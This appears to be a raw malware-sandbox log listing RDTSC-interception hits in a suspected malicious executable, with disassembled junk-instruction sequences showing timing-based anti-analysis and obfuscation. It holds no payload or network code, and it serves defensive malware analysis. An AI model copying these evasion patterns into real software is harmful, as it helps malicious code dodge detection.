Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DF514 second address: 4DF52A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FD180B5C15Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EE50D second address: 4EE517 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EE517 second address: 4EE523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EC6A8 second address: 4EC6C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED54Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECC3B second address: 4ECC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECC3F second address: 4ECC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FD1807ED550h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECC57 second address: 4ECC6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FD180B5C15Eh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECC6E second address: 4ECC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED559h 0x00000009 jnp 00007FD1807ED546h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECC9A second address: 4ECCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD180B5C156h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C162h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECCB9 second address: 4ECCBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECCBD second address: 4ECCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD180B5C15Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECCD4 second address: 4ECCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECCD8 second address: 4ECCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ECCDC second address: 4ECCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4ED409 second address: 4ED416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD180B5C156h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EE36B second address: 4EE3A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD1807ED546h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FD1807ED546h 0x00000013 popad 0x00000014 jmp 00007FD1807ED555h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD1807ED54Bh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EC173 second address: 4EC177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EC177 second address: 4EC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 jo 00007FD1807ED546h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EC197 second address: 4EC1A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD180B5C158h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4EC1A5 second address: 4EC1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 42E5DA second address: 42E5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 42E5DE second address: 42E5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4F3BB5 second address: 4F3BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4F3BBB second address: 4F3BD3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD1807ED54Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4F3EA2 second address: 4F3EA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4F64AE second address: 4F64E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007FD1807ED546h 0x0000000e jmp 00007FD1807ED551h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED550h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4F64E2 second address: 4F64E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 50190E second address: 50193C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FD1807ED551h 0x0000000b jmp 00007FD1807ED54Bh 0x00000010 pushad 0x00000011 jmp 00007FD1807ED54Ch 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 jo 00007FD1807ED54Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 504C64 second address: 504C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5086CB second address: 508718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED54Ch 0x00000011 jc 00007FD1807ED56Bh 0x00000017 jmp 00007FD1807ED555h 0x0000001c jmp 00007FD1807ED550h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5080AF second address: 5080B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5080B3 second address: 5080C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5080C3 second address: 5080C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 51B106 second address: 51B11F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD1807ED54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FD1807ED56Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 51B11F second address: 51B125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 51B125 second address: 51B138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD1807ED546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 51B138 second address: 51B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 521DFD second address: 521E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD1807ED54Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 521E11 second address: 521E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD180B5C167h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 521F8C second address: 521F9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FD1807ED546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 521F9B second address: 521FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD180B5C156h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 521FA8 second address: 521FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 52214F second address: 522155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 522155 second address: 522162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 522162 second address: 522168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 522403 second address: 522430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD1807ED555h 0x0000000c jmp 00007FD1807ED550h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 522430 second address: 522438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 522438 second address: 52243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5226D8 second address: 5226DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5226DC second address: 5226F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FD1807ED546h 0x0000000e jmp 00007FD1807ED54Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5226F4 second address: 522704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 522704 second address: 522715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD1807ED546h 0x00000009 jno 00007FD1807ED546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 524A26 second address: 524A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 5348FE second address: 534906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 534906 second address: 53492E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C165h 0x00000009 jmp 00007FD180B5C15Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 548C7E second address: 548C8E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56632F second address: 566335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 566335 second address: 566345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FD1807ED54Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565227 second address: 565244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD180B5C167h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565244 second address: 565249 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565249 second address: 56525D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD180B5C15Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56565C second address: 565671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED551h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565C4D second address: 565C58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565EEF second address: 565F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FD1807ED559h 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007FD1807ED552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565F17 second address: 565F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565F1D second address: 565F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565F25 second address: 565F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD180B5C156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 565F2F second address: 565F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED558h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FD1807ED546h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56A125 second address: 56A12B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56A20B second address: 56A215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56A215 second address: 56A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56A702 second address: 56A706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56A706 second address: 56A71B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56A71B second address: 56A720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 56DC1D second address: 56DC8D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD180B5C171h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jp 00007FD180B5C198h 0x00000018 jno 00007FD180B5C172h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FD180B5C166h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40108 second address: 4C40162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 adc ch, FFFFFFCEh 0x0000000c jmp 00007FD1807ED559h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007FD1807ED54Ch 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push edi 0x0000001e mov edx, eax 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD1807ED54Bh 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40162 second address: 4C40169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40169 second address: 4C40186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C40186 second address: 4C4018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20F50 second address: 4C20F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20F54 second address: 4C20F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20F71 second address: 4C20F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20F77 second address: 4C20F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C70112 second address: 4C701D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD1807ED54Ah 0x00000008 jmp 00007FD1807ED555h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 movzx eax, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD1807ED556h 0x0000001d xor eax, 26B64928h 0x00000023 jmp 00007FD1807ED54Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FD1807ED558h 0x0000002f or cx, 7B88h 0x00000034 jmp 00007FD1807ED54Bh 0x00000039 popfd 0x0000003a popad 0x0000003b movzx eax, di 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FD1807ED54Bh 0x00000045 mov ebp, esp 0x00000047 jmp 00007FD1807ED556h 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FD1807ED557h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C701D4 second address: 4C701EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C701EC second address: 4C701F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C000CB second address: 4C000DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C000DA second address: 4C000F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C000F2 second address: 4C0011B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD180B5C165h 0x00000013 rdtsc
